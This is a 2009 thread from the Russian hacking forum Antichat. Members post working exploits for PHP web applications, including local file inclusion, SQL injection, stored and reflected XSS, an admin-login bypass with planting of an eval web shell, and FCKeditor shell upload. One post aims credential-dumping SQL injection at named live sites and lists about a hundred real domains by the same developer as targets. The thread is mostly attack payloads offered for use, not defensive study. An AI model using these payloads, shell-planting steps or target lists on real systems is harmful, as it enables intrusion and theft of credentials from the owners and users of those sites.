Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
03.11.2009, 21:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
ZAKRZAK
LFI
Файл index.php
PHP код:
include('include/init.php');
Файл init.php
PHP код:
if ($_SESSION['lang'])
$lang=$_SESSION['lang'];
if ($_GET['lang']) $lang=$_GET['lang'];
if (!$lang)
{ $lang=$usr_prefs['lang']; }
$_SESSION['lang']=$lang; include('langs/'.$lang.'.php');
http://localhost/zakrzak-0.01/index.php?lang=../../test
|
|
|
04.11.2009, 04:42
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
В теме есть часть информации по нижеследующему, но не так подробно:
Sad Raven Guest Book <=v1.3
Она же sr guest.
Вход в админ панель:
Код:
<?php
if (!isset($alogin) || md5($pass) != $Password[$alogin] || !isset($Password[$alogin]))
?>
1. Админка находится по адресу: http://site.com/guest/admin.php
2. Зайти можно с таким запросом (условие - register globals=on):
Код:
http://site.com/guest/admin.php?pass=3105&alogin=3105&Password[3105]=37e7897f62e8d91b1ce60515829ca282
3105 - цифра от балды, а 37e7897f62e8d91b1ce60515829ca282 - это md5(3105)
но мы пока не админы, т.к. в админку пустило, но при попытке выполнить какие-либо действия в админке нас опять выкидывает на залогивание, смотрим:
1. После перехода по ссылке выше у нас появятся две куки:
Код:
Имя:
alogin
Содержимое:
3105
Узел:
site.com
Путь:
/guest/
Имя:
pass
Содержимое:
3105
Узел:
site.com
Путь:
/guest/
к которым надо будет добавить третью (через тот же плагин для FF cookie editor):
Код:
Имя:
Password[3105]
Содержимое:
37e7897f62e8d91b1ce60515829ca282
Узел:
site.com
Путь:
/guest/
и вот тогда мы уже полноценные админы
2. Заливка шелла:
- Идем в http://site.com/guest/admin.php?design
- Правим footer.inc.php - вставляем
Код:
<?php eval(stripslashes($_GET[e]));?>
для 100% уверенности, обходим magic_quotes=ON
3. проверяем:
http://site.com/guest/index.php?e=phpinfo();
4. Льем шелл.
====================================
fckeditor <=2.2
возможны версии чуть выше:
dork: inurl:dialog/fck_about.html
Раскрытие пути заливки файла:
1. Идем по адресу - editor/filemanager/browser/default/connectors/test.html
может отличаться, всегда поймете что искать идя от корня (если доступен просмотр папок с веба)
2. Выставляем Connector: - PHP
3. Жмем "Get Folders and Files" - появляется примерно такое среди всего прочего:
url="/config/_uploads/File/"/>
что есть абсолютный путь куда будут заливаться файлы относительно корня сайта, она же папка, доступная на запись.
Залитие шелла:
1. Connector: - PHP
2. Переименовываем шелл (например wso2.php) в wso2.php.xss - т.е. на конце задаем несуществующее расширение файла.
3. Заливаем
4. Переходим по ссылке (исходя из примера выше):
http://site.com/config/_uploads/File/wso2.php.xss
и всё, у вас полноценный шелл
бонус:
в очень многих даже пропатченных и современных версиях fceditor все равно есть уязвимости, например раскрытие асболютного пути сервера, если заливать корректный тип файла, но в поле "Current Folder" подставить что-то вроде:
ini.php%00
часто вываливается ошибка записи из tmp-директории с полным путем к управляющему скрипту
PS: fceditor используется в большинстве CMS - редактирование новости, загрузка картинок, редактирование страниц - всё он практически, полный путь к fceditor можно узнать попытавшись вставить картинку в тело новости и нажать на то, что сверху в этом окошке, типо title - открывается веб-путь к fceditor.
Проверить версию (пример) -
Код:
http://topkredite.ch/_admin/_system/htmleditor/editor/dialog/fck_about.html
|
|
|
|
seo тулза TextMaker от SibirDesign 2008 |
04.11.2009, 15:10
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
seo тулза TextMaker от SibirDesign 2008
SibirDesign AllRightReserved 2008
наверное, пользы от этого сообщения будет мало, но все равно выложу))
===================
LFI
magic_quotes = off
PHP код:
/index.php
...
include("login.php");
...
switch ($_GET['cmd']) {
case "config":
...
case "block":
$sym=array("q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m");
$sym2=array("Q","W","E","R","T","Y","U","I","O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M");
$_GET['type']=str_replace($sym2,$sym,$_GET['type']);
$_GET['use']=str_replace($sym2,$sym,$_GET['use']);
include("block/".$_GET['type']."/".$_GET['use'].".php");
break;
...
PHP код:
/login.php
...
if(($_GET['cmd']!="block")and($_GET['type']!='export')and($_GET['use']!='rss')){
if(isset($_POST['login']) and isset($_POST['password'])){
$_SESSION['login']=$_POST['login'];
$_SESSION['password']=$_POST['password'];
}
if(($_SESSION['login']!=$_auto['login'])or($_SESSION['password']!=$_auto['password'])){
include("form/login.htm");
exit();
}
}
...
exploit:
http://textmaker/?cmd=block&use=rss&type=../sql.txt%00 ====================
SQL-injection
magic_quotes = off
PHP код:
/index.php
...
как и при LFI. Но не меняя параметров $_GET['type'] и $_GET['use'] инклудится файл block\export\rss.php
...
PHP код:
/block/export/rss.php
...
if(@$_GET['done']!='yes'){
...
}else{
header("Content-Type: text/xml; charset=utf-8");
$sql3="SELECT * FROM `project` WHERE `id` LIKE '".@$_GET['viewid']."'";
$result1 = $db->sql_query($sql3);
$project=$db->sql_fetchrow($result1);
$sql3="SELECT * FROM `text` WHERE `idproject` LIKE '".@$_GET['viewid']."'";
$result1 = $db->sql_query($sql3);
$num=$db->sql_numrows($result1);
...
exploit:
http://textmaker/index.php?cmd=block&type=export&use=rss&done=yes&v iewid=1%27+union+select+1,2,concat_ws(0x20,user(), database(),version(),@@basedir,@@datadir,@@tmpdir, @@version_compile_os),4,5,6,7,8,9,10,11+--%20- в исходнике
<link>root@localhost textmaker 5.0.45-community-nt \usr\local\mysql5\ \usr\local\mysql5\data\ /tmp Win32</link>
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
08.11.2009, 06:28
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Название: Mi-Dia Blog
Автор: Christopher Shaw
Адресс оффициальной странички: http://www.mi-dia.co.uk/
Активная XSS.
В комментариях к записям блога.
[img]javascript:alert()[/img]
|
|
|
|
08.11.2009, 15:47
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Doop CMS 1.3.7 LFI
Оффсайт: http://doop.infoauxis.com/
Для загразки почему то доступна только эта версия, предыдущих я не нашел.
Сама CMS достаточно проста, имеет всего навсего один скрипт.
Уязвимый код:
Код:
if (!isset($_REQUEST['page'])){
$_REQUEST['page']=$homepage;
$cpage=$_REQUEST['page'];
} else { $cpage=$_REQUEST['page']; }
...
if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
if (file_exists("pages/".$cpage.".htm")){
include("pages/".$cpage.".htm");
}
else include("pages/".$cpage.".html");
}
Разработчики хоть и попытались "защититься" с помощю file_exists() и указанием папки, но совершенно забыли о фильтрации передаваемых значений.
Эксплатация:
Код:
http://localhost/cmss/index.php?page=../../../../file%00
|
|
|
|
08.11.2009, 17:13
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
Пермь - разработчик datakit
сайт разработчика - http://datakit.ru/
уязвимость - sql injection
table - sys_users (user_login,user_password)
admin panel - http://localhost/admin/logon/index.html
Примеры -
Код:
http://www.peugeot-perm.ru/main/index.html?id=192&nid=148/**/and/**/1=2/**/union/**/all/**/select/**/1,concat(user_login,0x3a,user_password),3,4,5,6,7/**/from/**/sys_users
Код:
http://www.spass.perm.ru/main/index.html?id=6&nid=88/**/and/**/1=2/**/union/**/all/**/select/**/1,2,concat(user_login,0x3a,user_password),3,4,5,6/**/from/**/sys_users
сайты принадлежащие датакит
Код:
12v.perm.ru
303030.ru
59.gibdd.ru
abperm.ru
abs59.ru
arsenal-perm.ru
auto.perm.tv
avocado-perevod.ru
beltprom.ru
bestcreditcard.ru
bestcreditcards.ru
bigbr.ru
black-bar.ru
chusovoy.ru
clubxl.ru
comcars.ru
comedy.perm.ru
crystalltech.ru
datakit.ru
dav-auto.ru
echo.perm.ru
ecotr.ru
edwardsgym.ru
eksformat.ru
empireguru.ru
eng.trophy59.perm.ru
ermak.ru
flashdj.ru
forstroy.ru
gagner.perm.ru
gibdd.perm.ru
globasclub.ru
globassclub.ru
goodwillperm.ru
if-detstvo1.ru
if-zaschita.ru
kgbpro.ru
kislorodclub.ru
komcars.ru
kuzov59.ru
lemax.tv
malmass.ru
mashtab-stroy.ru
mebelpolonii.ru
medpipe.ru
megastarperm.ru
migom.perm.ru
new-ground.ru
nravitso.ru
on-line.perm.ru
online59.ru
pecpl.ru
pnevmatic.ru
portacafe.ru
positiveline.ru
printhall.ru
ptsm.perm.ru
royalfm.ru
shoutaim.ru
skclassic.ru
spk-nhs.ru
staratovich.ru
stfc.ru
stolica-perm.ru
swedengroup.ru
syava.net
taan.ru
timontii.ru
timontii.shoutaim.ru
toyota-verratmn.ru
toyota59.ru
uitc.ru
vektor.perm.ru
verra-tyumen.ru
vs01.datakit.ru
www.abs59.ru
www.alexiy.ru
www.armsbp.ru
www.audit-kontrakt.ru
www.bionica-club.ru
www.bionicaclub.com
www.clubxl.ru
www.crazylove.perm.ru
www.dav-auto.ru
www.dveregrad.ru
www.edwardsgym.ru
www.ekskargo.ru
www.en.skclassic.ru
www.ermak.ru
www.gsi-pngs.ru
www.honda59.ru
www.new-ground.ru
www.nissan-tmn.ru
www.on-line.perm.ru
www.permdomo.ru
www.peugeot-perm.ru
www.plazaolympia.ru
www.portacafe.ru
www.shoutaim.ru
www.spass.perm.ru
www.tk.perm.ru
www.toyota59.ru
www.trophy59.perm.ru
www.ural-venture.ru
www.vektor.perm.ru
zurs.ru
(c) x60unu
|
|
|
|
08.11.2009, 23:40
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Программа: Quon Database Management
Описание: недостаточная фильтрация входяших данных, sql injection & xss
Уязвимый код:
moviepage.php
Код:
$query = "SELECT * FROM movie WHERE id=" . $_GET['id'];
$result = @mysql_query($query);
exploit: www.example.com/moviepage.php?id=1+union+select+1,2,3,4,5,concat_w s(0x3a,email,password,admin),7,8+from+users
barcode.php
Код:
$query = "SELECT * FROM movie WHERE id=" . $_GET['id'];
$result = @mysql_query($query);
$row = @mysql_fetch_array($result);
exploit: www.example.com/barcode.php?id=-1+union+select+email,2,password,4,5,6,7,8+from+use rs
checkin.php
Код:
<INPUT TYPE="text" name="check" id="check" value="<?php echo $getid;?>">
exploit:www.example.com/checkout.php?id=1%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
exploit:www.example.com/checkin.php?id=xss%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
©trumpcode.org
Последний раз редактировалось warlok; 08.11.2009 в 23:44..
|
|
|
|
09.11.2009, 01:23
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Ananta_Gazelle 1.0
Раскрытие путей
Код:
http://localhost/anata/search.php?lookup[]=ololo
Pasive XSS
Уязвимый код:
Код:
$pagetitle = "Search";
$lookup = "";
if (isset($_GET) && isset($_GET["lookup"]) && $_GET["lookup"]) {
$pagetitle .= " for ".$_GET["lookup"];
$lookup = $_GET["lookup"];
} else {
$lookup = "";
}
Как видно, передаваемый GET'ом парамерт lookup не
фифильтруется.
Эксплатация:
Код:
http://localhost/anata/search.php?lookup="><script>alert()</script>
Вторая пасивная XSS в скрипте user.php
Уязвимый код:
Код:
if (isset($_GET) && isset($_GET["user"]) && $_GET["user"]) {
$pagetitle .= " for ".$_GET["user"];
}
Та же картина.
Эксплатация:
Код:
http://localhost/anata/user.php?user="><script>alert()</script>
Но от XSS'ок толку нету, так как движок не работает с куками 
Так что это с чисто познавательной целью.
P.S: там еще есть что то пожожее на инъекцию в insert запросе, но сейчас времени мало. Если выжму с не что то - выложу 
|
|
|
|
09.11.2009, 07:42
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
AdaptBB
Версия: Последняя.
Активная XSS
/profile/
Avatar меняем на javascript:alert()
|
|
|
|
09.11.2009, 12:03
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
CMS Faethon v 2.0.4 SQL injection && Active XSS
Вreetz: Red_red1 && ElteRUS
Скрипт autor.php
Уязвимый код:
PHP код:
...
elseif(isset($_GET['name']))
{
$result=sql_query("SELECT id, name FROM ".$SQL_PREFIX."_authors WHERE item = '" . $_GET['name'] . "';");
}
...
Передаваемый GET'ом параметр name не фильтруеться.
Эксплатация:
Код:
http://localhost/bug/author.php?name=vasua'/**/and/**/substring(version(),1,1)=5/**/and/**/'1'='1
скритп info.php
PHP код:
$result=sql_query("SELECT title, text FROM ".$SQL_PREFIX."_html_sections WHERE address = '" . $_GET['item'] . "';");
Эксплатация:
Код:
http://localhost/bug/info.php?item=-1'[SQL]
XSS:
Уязвимый код:
PHP код:
...
$author = $_POST['author'];
$email = $_POST['email'];
$web = $_POST['web'];
$subject = $_POST['subject'];
...
Эксплатация:
В комментах:
Код:
"><script>alert()</script>
Последний раз редактировалось Ins3t; 09.11.2009 в 17:47..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.gif){kind=avatar}
Похожие темы
Линейный вид
